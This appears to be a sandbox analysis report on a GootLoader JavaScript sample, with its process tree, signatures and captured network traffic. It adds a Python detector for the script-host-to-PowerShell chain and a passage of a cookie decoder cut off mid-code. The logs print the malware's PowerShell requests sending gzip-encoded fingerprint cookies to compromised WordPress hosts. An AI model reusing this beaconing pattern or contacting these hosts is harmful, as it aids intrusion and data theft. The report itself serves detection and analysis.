Analysis

  • max time kernel
    143s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    17/03/2025, 20:53 UTC

General

  • Target

    f78bcfb8006be9862eab9ea95796547e26310c2535244f840fdade8eee63f579.js

  • Size

    140KB

  • MD5

    d6965f6455717a0b0bddff6d928d63e9

  • SHA1

    0a6d31d21aa3c6457cd70811b580eba1ebaa8ff2

  • SHA256

    f78bcfb8006be9862eab9ea95796547e26310c2535244f840fdade8eee63f579

  • SHA512

    71474421a619f2d2e529a34d1897dcc249aeda373190bec6d0b440a93d865a8d46fc09a8bb26a15ecc350f0ade635f76babb59e7bcb50a30270b031eab5088eb

  • SSDEEP

    3072:N+VTeMUatEduPTeAbZ0i36Gg0yPE4ABWPDrzvZ:STl0u7eA90iqGg0ylPDnZ

Malware Config

Signatures

  • GootLoader

    JavaScript loader known for delivering other families such as Gootkit and Cobalt Strike.

  • Gootloader family
  • Blocklisted process makes network request (4 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely a geofence.

  • Command and Scripting Interpreter: JavaScript (1 TTP)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (10 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)
  • Uses Task Scheduler COM API (1 TTP)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe (depth 1)
    wscript.exe C:\Users\Admin\AppData\Local\Temp\f78bcfb8006be9862eab9ea95796547e26310c2535244f840fdade8eee63f579.js
    PID:1752

  • C:\Windows\system32\wscript.EXE (depth 1: recorded as a second root, not as a child of PID 1752, which is consistent with the Task Scheduler COM API signature above)
    C:\Windows\system32\wscript.EXE PATIEN~1.JS
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4192
    • C:\Windows\System32\cscript.exe (depth 2)
      "C:\Windows\System32\cscript.exe" "PATIEN~1.JS"
      • Suspicious use of WriteProcessMemory
      PID:1380
      • C:\Windows\System32\WindowsPowerShell\v1.0\PoweRsHELl.exe (depth 3)
        PoweRsHELl
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1052
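
    The chain above (wscript.EXE running the dropped PATIEN~1.JS, which spawns cscript.exe on the same file, which spawns PowerShell) is the part of this report worth turning into a detection. The block below is an added example and is not tria.ge code: it runs three rules over constructed Sysmon-style process-creation events whose PIDs, image paths and command lines are copied from the tree (the parent PIDs of the two depth-1 roots are not on the page and are invented, as are the benign control event and the on-disk size table). Image names are lower-cased before matching so the mixed-case PoweRsHELl.exe still hits; the size rule uses the 40.7MB of the dropped script from the Downloads section against the 140KB submitted file. The field names pid/ppid/image/cmdline are an assumed normalised schema, not Sysmon's own event XML.

```python
"""Process-chain detection over constructed process-creation events.

Added example for this report, not tria.ge code. PIDs, images and command
lines come from the report's process tree; the parent PIDs of the two
roots, the benign control event and the size table are constructed.
"""
import ntpath
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")
# The dropped PATIEN~1.JS is 40.7MB against a 140KB submitted file; a
# script file above this threshold is worth a finding on its own.
LARGE_SCRIPT_BYTES = 5 * 1024 * 1024

SUBMITTED = "f78bcfb8006be9862eab9ea95796547e26310c2535244f840fdade8eee63f579.js"


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the report's tree (parent PIDs 700, 800 and
# 600 are placeholders; the page does not show them).
EVENTS = [
    ProcEvent(1752, 700, r"C:\Windows\system32\wscript.exe",
              "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\" + SUBMITTED),
    ProcEvent(4192, 800, r"C:\Windows\system32\wscript.EXE",
              r"C:\Windows\system32\wscript.EXE PATIEN~1.JS"),
    ProcEvent(1380, 4192, r"C:\Windows\System32\cscript.exe",
              r'"C:\Windows\System32\cscript.exe" "PATIEN~1.JS"'),
    ProcEvent(1052, 1380,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\PoweRsHELl.exe",
              "PoweRsHELl"),
    # Benign control: an admin running a small inventory script.
    ProcEvent(2000, 600, r"C:\Windows\system32\cscript.exe",
              r"cscript.exe \\fileserver\scripts\inventory.js"),
]

# Constructed size lookup keyed by lower-cased basename; the two report
# files carry the sizes the report gives (140KB submitted, 40.7MB dropped).
FILE_SIZES = {
    SUBMITTED: 140 * 1024,
    "patien~1.js": int(40.7 * 1024 * 1024),
    "inventory.js": 12 * 1024,
}


def image_name(path: str) -> str:
    """Lower-cased basename, so PoweRsHELl.exe and powershell.exe match."""
    return ntpath.basename(path).lower()


def script_args(cmdline: str) -> list[str]:
    """Quoted or bare arguments that carry a script-host extension."""
    tokens = [q or bare for q, bare in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    return [t for t in tokens if t.lower().endswith(SCRIPT_EXTS)]


def ancestors(pid: int, by_pid: dict[int, ProcEvent]) -> list[ProcEvent]:
    """Parent chain, nearest first; stops at an unknown parent or a cycle."""
    chain, seen, ev = [], {pid}, by_pid.get(pid)
    while ev is not None:
        parent = by_pid.get(ev.ppid)
        if parent is None or parent.pid in seen:
            break
        chain.append(parent)
        seen.add(parent.pid)
        ev = parent
    return chain


def analyse(events: list[ProcEvent]) -> list[tuple[str, int]]:
    """Return (rule, pid) findings for a batch of process-creation events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = image_name(ev.image)
        if name in SHELLS and any(image_name(a.image) in SCRIPT_HOSTS
                                  for a in ancestors(ev.pid, by_pid)):
            findings.append(("script_host_spawned_powershell", ev.pid))
        if name in SCRIPT_HOSTS:
            parent = by_pid.get(ev.ppid)
            if parent is not None and image_name(parent.image) in SCRIPT_HOSTS:
                findings.append(("nested_script_host", ev.pid))
            for arg in script_args(ev.cmdline):
                size = FILE_SIZES.get(ntpath.basename(arg).lower())
                if size is not None and size >= LARGE_SCRIPT_BYTES:
                    findings.append(("oversized_script_file", ev.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in analyse(EVENTS):
        print(f"{rule:32} pid={pid}")
```

    Run against the constructed batch this yields four findings (PID 4192 and PID 1380 for the oversized script, PID 1380 for the wscript-to-cscript hop, PID 1052 for PowerShell under a script host) and nothing for the original 140KB submission or the benign control, which is the split an analyst wants: the padded second-stage file and the hand-off chain stand out, an ordinary .js run does not.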

    Network

    Only the entries attributed to PoweRsHELl.exe below are the sample's own traffic. The g.bing.com requests (user-agent WindowsShellClient) and the c.pki.goog CRL fetch (user-agent Microsoft-CryptoAPI) carry no process attribution and are Windows background activity in the sandbox.

    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=17417CDB63136D281522696962986C5B; domain=.bing.com; expires=Sat, 11-Apr-2026 20:57:03 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: DC3053EC0120480DA87A800BC4E6D363 Ref B: FRA31EDGE0408 Ref C: 2025-03-17T20:57:03Z
      date: Mon, 17 Mar 2025 20:57:02 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=17417CDB63136D281522696962986C5B
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=rD71uPPc8VVWh1y7KmTBS1s1ykWoJfdP5tOAnLyRii8; domain=.bing.com; expires=Sat, 11-Apr-2026 20:57:03 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 181A2B2956FD48AA9291EC8EB729F6D3 Ref B: FRA31EDGE0408 Ref C: 2025-03-17T20:57:03Z
      date: Mon, 17 Mar 2025 20:57:02 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=17417CDB63136D281522696962986C5B; MSPTC=rD71uPPc8VVWh1y7KmTBS1s1ykWoJfdP5tOAnLyRii8
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 4B5C811AFA15409DA57FC47DA9ACF3FE Ref B: FRA31EDGE0408 Ref C: 2025-03-17T20:57:03Z
      date: Mon, 17 Mar 2025 20:57:02 GMT
    • flag-us
      DNS
      c.pki.goog
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.200.35
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Remote address:
      142.250.200.35:80
      Request
      GET /r/r1.crl HTTP/1.1
      Cache-Control: max-age = 3000
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Response
      HTTP/1.1 304 Not Modified
      Date: Mon, 17 Mar 2025 20:13:51 GMT
      Expires: Mon, 17 Mar 2025 21:03:51 GMT
      Age: 2653
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Cache-Control: public, max-age=3000
      Vary: Accept-Encoding
    • flag-us
      DNS
      aiimskalyani.edu.in
      PoweRsHELl.exe
      Remote address:
      8.8.8.8:53
      Request
      aiimskalyani.edu.in
      IN A
      Response
      aiimskalyani.edu.in
      IN A
      103.191.209.38
    • flag-in
      GET
      https://aiimskalyani.edu.in/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      103.191.209.38:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=H4sIAAAAAAAEAI1UXW+bMBT9K+ZtkybUJlU0LU8OmMSTjZFtkk6yiDLidUghIKBrK/Hja0NYyFqlewBx7zn3cj+ODQmJBeIi4izABCXeNxVVxUO1y/1ds2sdGEU+lND641pXtYL7PDsqWJYWV7zYGfOhdbwiz4vjKTTIDroepQKdQ/Wc3ngv4tPz19nnN2Ggc18L3szuppMPf8doFEvEQ0hRsiDRZgkj0SUSpU5t9CY77ounWtUvdaPz6USl+d7Vz7p1/Cr7oyvb8JgnBl4P1+pMa50Vo8jneG0n2lsRlKtkPMTWIcyD5IMJkyLdHSx1yUKzqDXiiVI+9P0fvdU6YUwXiG9ZsDVL9JAQjItk0jrsqLuK/s08+A1DJKdmtqFsHVshupeJa2Y1d9E9mrsLKOeuR/25u14I+zK+78I+5mMjAvtazV0qPEOLiMkxlLCF3FthiTwZc5RA6s/uxij2UShxgE07HQYCI6TDC5gBWuz1AdxOgWh0WRpxgckXAB+b3/rYZKkhj9MQtEYkmY1dHK2xwCxMbvY3ZgojNb8R91W5XsLXtPmX+b4QDRwvCPbOe4gefx6ytHV6BQ1LGmxeFM1IZ60jEY2uykNJnZeG9380e959RiEOR+fg7NxyBikOl8ONcMnpjs9JvtYe3RsX0n4yxWfVRRtMbChOaJZWRV38asAJALc3wMzrFY14OO2JBAAA; CAB41E62C01=H4sIAAAAAAAEAC2PwW7EIAxEv4VPaVeRuodqq02knlniJDSAkW1IIvHxhVJxGTzMw/PSZl8JU5gnzfsHshRlMGxdMDEXNTvX7/Phi4IzOiSgohYMMlPu3n12UJRj3RKPZbEGbs6afcJnCkVFPIB4A+eKesJqWeiqKgWxHt4J9wYcQZPZ3mIsioFyRVQW2/4B+0bmiOg417cxDqfc0D9eP20cOZs6FU3yCSENZwSyEAz0TtX9x1zssS40XixQ60it3ZyjqAlOuYeYpEdSYDC6LXPYUI/8CYdri397+0V5HH4BCpZdqkABAAA=; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=H4sIAAAAAAAEAF2S3W7bMAyFX8V5gAlpuhfonDQIkKyB05/LQbaZWKgkaiTtJEUefpSbrNjuxE+UeHjIu+fOcbEtL5O7Cppz46H44aJGJUYh9MXWRvAaP7Rh5GtXkyUHfJnc/5/zE+SI9K6npwhzcgNcJjNNGoDkkTBscAAz1Pwv3YGYk+fTF11FJ8569wEmoeSLReukxJAImA0kvqJtz93t7eLkpIKQS9wfUhpJQpItJuOxUVWzJdkoG7DcE5iQvitaRRbr/dxxwD6K0pnStQtOduChEXMMGegH+SM+a+npxjWEjHspFu0h9/iURF98wJKwT2bgUfOWUPSD0iPDTWQFv3tgWURbe7WCOYyQYezOg4CB068bW4XcgFHB4fOxaiXNjHtH4Zr4qXJ0dv5afdvsMuvwWEGLNyW7nhPEtsR0NhD2Sl5inT25+v2M2ecRZ/oSU197p9bqpEd6jf9OoJOQ5/1mpemyNaaxtSa+kROoYMB3MC02Wnr6oE7VVooKbAtUzHXRpo+OYI/5dol40I0rO10D9XH6ui6LAK2zRfL2DPQHgFyWR54CAAA=; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDM1MTM2NzWzqFF0izMzNDQ0MjYyAADsmH8NGgAAAA==
      Host: aiimskalyani.edu.in
      Connection: Close
      Response
      HTTP/1.1 403 Forbidden
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 1242
      date: Mon, 17 Mar 2025 20:58:22 GMT
      server: LiteSpeed
      vary: User-Agent
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    • flag-in
      GET
      https://aiimskalyani.edu.in/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      103.191.209.38:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=[identical to the value in the first request above; elided]; CAB41E62C01=H4sIAAAAAAAEAC2P3W7DIAyFn4VH2apI68XUqam0a0qchgWwZRuSSDz8YJl847/z+dhhWlC0GicsUs0UwllPW6wGdgrIwNXMmHTics6uU4BqgtiuuM2zd3AJ3q0PvOdUDeEGLAuEUM0dXl6Uj5blpD7CO+PagSNYdssbUTUCXBqiscSfByR2shBikNJ2iYZdLxhvz5/eJimuddWyfkLKw07AHpKDj1Nd3D/mkIjN0HiIQntHrax9slXzgF2vibKekpwEnO1mNp9a6F8S8NXl39F/cRmHXyZMoLUsAQAA; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=[identical to the value in the first request above; elided]; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDM1MTM2NzWzqFF0izMzNDQ0MjYyAADsmH8NGgAAAA==
      Host: aiimskalyani.edu.in
      Connection: Close
      Response
      HTTP/1.1 403 Forbidden
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 1242
      date: Mon, 17 Mar 2025 20:58:43 GMT
      server: LiteSpeed
      vary: User-Agent
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    • flag-us
      DNS
      pcpro100.info
      PoweRsHELl.exe
      Remote address:
      8.8.8.8:53
      Request
      pcpro100.info
      IN A
      Response
      pcpro100.info
      IN A
      104.21.64.1
      pcpro100.info
      IN A
      104.21.32.1
      pcpro100.info
      IN A
      104.21.112.1
      pcpro100.info
      IN A
      104.21.48.1
      pcpro100.info
      IN A
      104.21.16.1
      pcpro100.info
      IN A
      104.21.80.1
      pcpro100.info
      IN A
      104.21.96.1
    • flag-us
      GET
      https://pcpro100.info/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      104.21.64.1:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=[identical to the value in the first request above; elided]; CAB41E62C01=H4sIAAAAAAAEAC2P3W7DIAyFn4VH2apI68XUqam0a0qchgWwZRuSSDz8YJl847/z+dhhWlC0GicsUs0UwllPW6wGdgrIwNXMmHTics6uU4BqgtiuuM2zd3AJ3q0PvOdUDeEGLAuEUM0dXl6Uj5blpD7CO+PagSNYdssbUTUCXBqiscSfByR2shBikNJ2iYZdLxhvz5/eJimuddWyfkLKw07AHpKDj1Nd3D/mkIjN0HiIQntHrax9slXzgF2vibKekpwEnO1mNp9a6F8S8NXl39F/cRmHXyZMoLUsAQAA; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=H4sIAAAAAAAEAF2S3W7bMAyFX8V5gAlpuhfonDQIkKyB05/LQbaZWKgkaiTtJEUefpSbrNjuxE+UeHjIu+fOcbEtL5O7Cppz46H44aJGJUYh9MXWRvAaP7Rh5GtXkyUHfJnc/5/zE+SI9K6npwhzcgNcJjNNGoDkkTBscAAz1Pwv3YGYk+fTF11FJ8569wEmoeSLReukxJAImA0kvqJtz93t7eLkpIKQS9wfUhpJQpItJuOxUVWzJdkoG7DcE5iQvitaRRbr/dxxwD6K0pnStQtOduChEXMMGegH+SM+a+npxjWEjHspFu0h9/iURF98wJKwT2bgUfOWUPSD0iPDTWQFv3tgWURbe7WCOYyQYezOg4CB068bW4XcgFHB4fOxaiXNjHtH4Zr4qXJ0dv5afdvsMuvwWEGLNyW7nhPEtsR0NhD2Sl5inT25+v2M2ecRZ/oSU197p9bqpEd6jf9OoJOQ5/1mpemyNaaxtSa+kROoYMB3MC02Wnr6oE7VVooKbAtUzHXRpo+OYI/5dol40I0rO10D9XH6ui6LAK2zRfL2DPQHgFyWR54CAAA=; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDM1MTM2NzWzqFF0izMzNDQ0MjYyAADsmH8NGgAAAA==
      Host: pcpro100.info
      Connection: Close
      Response
      HTTP/1.1 405 Method Not Allowed
      Date: Mon, 17 Mar 2025 20:59:04 GMT
      Content-Type: text/plain;charset=UTF-8
      Content-Length: 42
      Connection: close
      Server: cloudflare
      X-Robots-Tag: noindex, follow
      Allow: POST
      Cf-Cache-Status: DYNAMIC
      Set-Cookie: ppwp_wp_session=98e2cbb022bc12cd383774796afe42fb%7C%7C1742246944%7C%7C1742246584; Max-Age=1800; Expires=Mon, 17 Mar 2025 21:29:04 GMT
      CF-RAY: 921f6978680e71c2-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-in
      GET
      https://aiimskalyani.edu.in/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      103.191.209.38:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=[identical to the value in the first request above; elided]; CAB41E62C01=H4sIAAAAAAAEAC2P3W7DIAyFn4VH2apI68XUqam0a0qchgWwZRuSSDz8YJl847/z+dhhWlC0GicsUs0UwllPW6wGdgrIwNXMmHTics6uU4BqgtiuuM2zd3AJ3q0PvOdUDeEGLAuEUM0dXl6Uj5blpD7CO+PagSNYdssbUTUCXBqiscSfByR2shBikNJ2iYZdLxhvz5/eJimuddWyfkLKw07AHpKDj1Nd3D/mkIjN0HiIQntHrax9slXzgF2vibKekpwEnO1mNp9a6F8S8NXl39F/cRmHXyZMoLUsAQAA; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=H4sIAAAAAAAEAF2S3W7bMAyFX8V5gAlpuhfonDQIkKyB05/LQbaZWKgkaiTtJEUefpSbrNjuxE+UeHjIu+fOcbEtL5O7Cppz46H44aJGJUYh9MXWRvAaP7Rh5GtXkyUHfJnc/5/zE+SI9K6npwhzcgNcJjNNGoDkkTBscAAz1Pwv3YGYk+fTF11FJ8569wEmoeSLReukxJAImA0kvqJtz93t7eLkpIKQS9wfUhpJQpItJuOxUVWzJdkoG7DcE5iQvitaRRbr/dxxwD6K0pnStQtOduChEXMMGegH+SM+a+npxjWEjHspFu0h9/iURF98wJKwT2bgUfOWUPSD0iPDTWQFv3tgWURbe7WCOYyQYezOg4CB068bW4XcgFHB4fOxaiXNjHtH4Zr4qXJ0dv5afdvsMuvwWEGLNyW7nhPEtsR0NhD2Sl5inT25+v2M2ecRZ/oSU197p9bqpEd6jf9OoJOQ5/1mpemyNaaxtSa+kROoYMB3MC02Wnr6oE7VVooKbAtUzHXRpo+OYI/5dol40I0rO10D9XH6ui6LAK2zRfL2DPQHgFyWR54CAAA=; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDO1sLAwNTQyqFF0izMzNDQ0MjYyAABukmIPGgAAAA==
      Host: aiimskalyani.edu.in
      Connection: Close
      Response
      HTTP/1.1 403 Forbidden
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 1242
      date: Mon, 17 Mar 2025 20:59:25 GMT
      server: LiteSpeed
      vary: User-Agent
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    Connections (protocols | process | bytes sent / received | packets sent / received)

    • 150.171.27.10:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      tls, http2 | 2.0kB / 9.4kB | 22 / 19
      HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= → HTTP Response: 204
      HTTP Request: GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= → HTTP Response: 204
      HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= → HTTP Response: 204
    • 142.250.200.35:80
      http://c.pki.goog/r/r1.crl
      http | 384 B / 355 B | 4 / 3
      HTTP Request: GET http://c.pki.goog/r/r1.crl → HTTP Response: 304
    • 103.191.209.38:443
      https://aiimskalyani.edu.in/xmlrpc.php
      tls, http | PoweRsHELl.exe | 2.8kB / 5.5kB | 10 / 11
      HTTP Request: GET https://aiimskalyani.edu.in/xmlrpc.php → HTTP Response: 403
    • 103.191.209.38:443
      https://aiimskalyani.edu.in/xmlrpc.php
      tls, http | PoweRsHELl.exe | 2.8kB / 2.2kB | 8 / 8
      HTTP Request: GET https://aiimskalyani.edu.in/xmlrpc.php → HTTP Response: 403
    • 104.21.64.1:443
      https://pcpro100.info/xmlrpc.php
      tls, http | PoweRsHELl.exe | 2.7kB / 4.0kB | 10 / 10
      HTTP Request: GET https://pcpro100.info/xmlrpc.php → HTTP Response: 405
    • 103.191.209.38:443
      https://aiimskalyani.edu.in/xmlrpc.php
      tls, http | PoweRsHELl.exe | 2.8kB / 2.2kB | 8 / 7
      HTTP Request: GET https://aiimskalyani.edu.in/xmlrpc.php → HTTP Response: 403
    • 8.8.8.8:53
      g.bing.com
      dns | 56 B / 148 B | 1 / 1
      DNS Request: g.bing.com → DNS Response: 150.171.27.10, 150.171.28.10
    • 8.8.8.8:53
      c.pki.goog
      dns | 56 B / 107 B | 1 / 1
      DNS Request: c.pki.goog → DNS Response: 142.250.200.35
    • 8.8.8.8:53
      aiimskalyani.edu.in
      dns | PoweRsHELl.exe | 65 B / 81 B | 1 / 1
      DNS Request: aiimskalyani.edu.in → DNS Response: 103.191.209.38
    • 8.8.8.8:53
      pcpro100.info
      dns | PoweRsHELl.exe | 59 B / 171 B | 1 / 1
      DNS Request: pcpro100.info → DNS Response: 104.21.64.1, 104.21.32.1, 104.21.112.1, 104.21.48.1, 104.21.16.1, 104.21.80.1, 104.21.96.1
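
    The four PoweRsHELl.exe requests above send GET /xmlrpc.php to compromised WordPress hosts with the same five cookies, CAB41E62C0 through CAB41E62C04. Every value is base64 starting with "H4sI", which is the base64 form of the gzip magic bytes 1f 8b 08, and the full ten-byte prefix "H4sIAAAAAAAEA" (XFL=4, OS=0) is what .NET's GZipStream writes, as PowerShell would. The block below is an added example, not tria.ge code and not the loader's: it parses a Cookie header, base64-decodes each value, reads the declared uncompressed length (ISIZE) from the gzip trailer, and then tries the full decompression, so an analyst can size the fingerprint being exfiltrated before looking at its content. The CAB41E62C02 and CAB41E62C04 values are copied from the captured requests (CAB41E62C04 from both the first and the third request to aiimskalyani.edu.in); the Cookie header assembled from them and the round-trip sample are constructed.

```python
"""Unpack the gzip+base64 cookie values the PowerShell stage sends.

Added example for this report, not tria.ge code. The CAB41E62C02 and
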